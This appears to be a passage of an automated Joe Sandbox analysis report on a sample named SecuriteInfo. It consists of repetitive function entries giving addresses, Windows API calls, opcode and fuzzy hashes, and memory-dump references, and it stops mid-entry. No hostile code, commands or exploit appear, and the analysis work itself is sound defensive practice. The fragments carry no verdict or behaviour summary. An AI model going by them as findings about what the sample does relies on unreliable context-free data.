                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                            • API String ID: 6828938-1817031585
                                                            • Opcode ID: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                            • Instruction ID: 2b680102821304253a3946cbd1a5ba502c6091636c9179b905bdd94bf4b8d01c
                                                            • Opcode Fuzzy Hash: 4a0a64217b4c8618eeaa0cd08dc669878e89b812572458f449172cc44ebe3956
                                                            • Instruction Fuzzy Hash: F5218E21A0D74A81FB10FB28E4462E9E365BF66788FD40132EB0D4369EDEBCE5048760
                                                            Function 00007FF7B110DB00 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7B110DAEB), ref: 00007FF7B110DC1C
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF7B110DAEB), ref: 00007FF7B110DCA7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ConsoleErrorLastMode
                                                            • String ID:
                                                            • API String ID: 953036326-0
                                                            • Opcode ID: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                            • Instruction ID: b2a3eb19470bde424ef39dff41ca2e061a3c1d7ef0be8f8a251e51fc3ad429c1
                                                            • Opcode Fuzzy Hash: 284863bd4a310ef6da540e9dcdc048057ff4d3a865a35ff47f01b15d00241537
                                                            • Instruction Fuzzy Hash: 3891D962E0865985FB50AF2DA4442BDABA0FB2678CFA44139DF0DD768CDFB8D441C720
                                                            Function 00007FF7B11102CC Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst
                                                            • String ID:
                                                            • API String ID: 4170891091-0
                                                            • Opcode ID: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                            • Instruction ID: d2f75bb8486a11420a9de43a1b89242434d4c8b4f406f2afe99b86f283359d49
                                                            • Opcode Fuzzy Hash: 20717f0f8a23f829e42a50c12fade424b7597f0ff0c8303254556571f0db49b3
                                                            • Instruction Fuzzy Hash: F5514972F046198AEB24EF2CA9822BCE765AB6135CF910135DF1E42ED9DF7CA451C700
                                                            Function 00007FF7B1105CE0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1279662727-0
                                                            • Opcode ID: aa1200e4450b811ef51af53757025c3530a17c13a58b8d92a8c5dd8a9775bf7a
                                                            • Instruction ID: abeb23b870270e96e6c39f43b048857ef4b210a3f1b798e3776b500ba4681a15
                                                            • Opcode Fuzzy Hash: aa1200e4450b811ef51af53757025c3530a17c13a58b8d92a8c5dd8a9775bf7a
                                                            • Instruction Fuzzy Hash: C541C522D1878683F750AB24A548379E360FFA6758F609335E79C03AD9DFBCA5E18710
                                                            Function 00007FF7B10FC1BC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 3251591375-0
                                                            • Opcode ID: 6f7f5303e9b22c034abd0ab4f6e45a615f00bbc4bee0f7f82c8393816be5d00e
                                                            • Instruction ID: 08f30645f8312e4a1ccbe17cabdc1636e4b20d18ffaf8cd1343e3a759fc72d82
                                                            • Opcode Fuzzy Hash: 6f7f5303e9b22c034abd0ab4f6e45a615f00bbc4bee0f7f82c8393816be5d00e
                                                            • Instruction Fuzzy Hash: 04312811E0D24641EB54BB6DA6977B993519F7338CFC45434DB0E4B6DFDEACA5048220
                                                            Function 00007FF7B110A5A0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                            • Instruction ID: 22f5f8de8829698b57a9a76934a125e01d22bd8617649a34f2afe086382bd9b0
                                                            • Opcode Fuzzy Hash: 4ba61a3cc0556e7c92b6fc1e72a638e9c9ea62dc27ce852986ab15971a897a88
                                                            • Instruction Fuzzy Hash: 2ED05E10F0960E82EB143B39384C17CC321AF7B748F901438CA0B0238BCEBDA81D4360
                                                            Function 00007FF7B10F8B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryMessage
                                                            • String ID: Security descriptor is not initialized!
                                                            • API String ID: 73271072-986317556
                                                            • Opcode ID: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                            • Instruction ID: 0267318edfa85172d1857556a1820ac9e2ef3dd46fcb302106843821384b59cb
                                                            • Opcode Fuzzy Hash: c8cf0510d3cf58293c8056e04266fc05212419b77e6f78cec61fc6e6c2a7edb1
                                                            • Instruction Fuzzy Hash: 19E06DB1A18B4B86EB10AB18E845269A290BB62358FC01334E74C463E8EFBCD1198B00
                                                            Function 00007FF7B110085C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                            • Instruction ID: 4733f30b7f2ad0fd43dfad645b51276027c09083cd86dcb33553348373d5fab5
                                                            • Opcode Fuzzy Hash: b54b3d0524db6e35a6be9399f4168b0f839baac618e96e940c4dc5df63f75cb8
                                                            • Instruction Fuzzy Hash: B451E621E0964985F724A92DA41867AE395FF56BECFA44331DF6D067CDCEBCD4408620
                                                            Function 00007FF7B110B6FC Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7B110B579,?,?,00000000,00007FF7B110B62E), ref: 00007FF7B110B76A
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B110B579,?,?,00000000,00007FF7B110B62E), ref: 00007FF7B110B774
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            • Opcode ID: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                            • Instruction ID: 7f3f067a4b5c5df681ef5a08d47631c04d8fe901ec2273b0f2f462f8992806ef
                                                            • Opcode Fuzzy Hash: e3b73f063bb60367d817196ec2a4f8f6eb52bee7e7896c4ceb0739ce7562b917
                                                            • Instruction Fuzzy Hash: DA219514F08A4A41EF50772DB5882799393DFA6798FA88635DB1D473DDCEECA4844324
                                                            Function 00007FF7B110CCD4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                            • Instruction ID: 46ff5c7c32b98e411d10fefde1e51a0ea652cb39cb525cd821c42582bcb47c65
                                                            • Opcode Fuzzy Hash: 62a26f8d1512d31d847f2a475d98554d5a752059faf1bb854899a2cf804e20f8
                                                            • Instruction Fuzzy Hash: D611B261A18B4581DB10AB29B44826DE761EB96BF8FA44332EF7D077DDCEBCD0508750
                                                            Function 00007FF7B110869C Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1108519), ref: 00007FF7B11086BF
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7B1108519), ref: 00007FF7B11086D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            • String ID:
                                                            • API String ID: 1707611234-0
                                                            • Opcode ID: 3f928a0497d734aaa543a8bc106b0ded184f8e5dbef2df712f99b41af6c17d4b
                                                            • Instruction ID: 526f2a9f9632c21339e16e0a1ce341dddab54c49b5ac5e57eb3942a7b5abe0e2
                                                            • Opcode Fuzzy Hash: 3f928a0497d734aaa543a8bc106b0ded184f8e5dbef2df712f99b41af6c17d4b
                                                            • Instruction Fuzzy Hash: 90018232D0C659C2E754AB19B44527AF7A1FB92769FB00235E7A9019DCEBBCD010CB10
                                                            Function 00007FF7B110B4EC Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B502
                                                            • GetLastError.KERNEL32(?,?,?,00007FF7B1113972,?,?,?,00007FF7B11139AF,?,?,00000000,00007FF7B1113E75,?,?,00000000,00007FF7B1113DA7), ref: 00007FF7B110B50C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                            • Instruction ID: b180a7b12baefcfd1c7d4d1963978d37c5a8013b613d615666d951e890446c30
                                                            • Opcode Fuzzy Hash: c6b9e98d984d24e8bfd8e8ff83776c8447130b112ec08e9122362d67c2677dc5
                                                            • Instruction Fuzzy Hash: 38E08654F0920A42FF047BBA7848174D352DFBB708FD44034EB0D46259EEAC69954230
                                                            Function 00007FF7B1108C88 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                            • Instruction ID: f2ccdabb737bf18c21bb44967e7000d9b1cb4ee0da90523aa4fb54783fa85fbb
                                                            • Opcode Fuzzy Hash: 94f9cb437eb1ff87f9bc785627a082ceb46c643cc627e045b1becda1a3c124ee
                                                            • Instruction Fuzzy Hash: 70D0C914E1E50B82E75837BE2C4D1B8E2A0AFA772DFF00630C21D811D8DEACA1954221
                                                            Function 00007FF7B1108404 Relevance: 3.0, APIs: 2, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                            • Instruction ID: 803192e1a22b579c28ddadc55bc4f1997d7a74f2ccd8c75ca458d558660e8d85
                                                            • Opcode Fuzzy Hash: 25cba87855c0571564d380caaddad194b65a7b1ee83bb0c7e49656b6643110b8
                                                            • Instruction Fuzzy Hash: 27D0C914E1D50B82E75437BE3889279A2909F77729FF20734C61DC01D9DEDCA1950221
                                                            Function 00007FF7B10F7D40 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00007FF7B10F8BD0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7B10F2A9B), ref: 00007FF7B10F8C0A
                                                            • _findclose.LIBCMT ref: 00007FF7B10F7F99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_findclose
                                                            • String ID:
                                                            • API String ID: 2772937645-0
                                                            • Opcode ID: f2eb7eeb8a75ce0ecdb705190dd43c37d981f86f995c6e102987c4b14f6ec9f8
                                                            • Instruction ID: ab15f2e01f159de60baaf85e6c28c3efe47409953bd96aab62362e057b592349
                                                            • Opcode Fuzzy Hash: f2eb7eeb8a75ce0ecdb705190dd43c37d981f86f995c6e102987c4b14f6ec9f8
                                                            • Instruction Fuzzy Hash: F171BF53E18AC581EB11DB2CD5462FDA360F7A9B4CF95E321DB8C12596EF68E2D9C300
                                                            Function 00007FF7B110CA4C Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                            • Instruction ID: e348ce3537d4ffd9ea303ea5e5a432102ad62f1b77e9ae18457d1f219ea1df6f
                                                            • Opcode Fuzzy Hash: 9bd69e230f0d3b0e5758ab1338c67e81032152045ba6d69f05b41d5745cc01d1
                                                            • Instruction Fuzzy Hash: E041D832D0464983EB24EA1DB545279B350FB67B98F640232D78E826D9CFACE442CB61
                                                            Function 00007FF7B10F82B0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778850312.00007FF7B111C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B112F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1778973485.00007FF7B1131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1779212543.00007FF7B1133000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7b10f0000_SecuriteInfo.jbxd
                                                            Similarity
                                                            • API ID: _fread_nolock
                                                            • String ID:
                                                            • API String ID: 840049012-0
                                                            • Opcode ID: 10c21e676c2fdd7a0020f06bdc09e795063deb41ee1ea4fa70822272de4cf310
                                                            • Instruction ID: e99b3fbd56dc6bd72e37236201d965a4b0442569b88fe90ee52e2c43ffad23c0
                                                            • Opcode Fuzzy Hash: 10c21e676c2fdd7a0020f06bdc09e795063deb41ee1ea4fa70822272de4cf310
                                                            • Instruction Fuzzy Hash: 0F21A221B0C65646EB50BA1A64557FAE751FF56BD8FD88031EF0C077AACEBCE041C620
                                                            Function 00007FF7B110C4DC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1778735323.00007FF7B10F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B10F0000, based on PE: true
                                                            • Associated: 00000000.00000002.1778613110.00007FF7B10F0000.00000002.00000001.01000000.00000003.sdmpDownload File
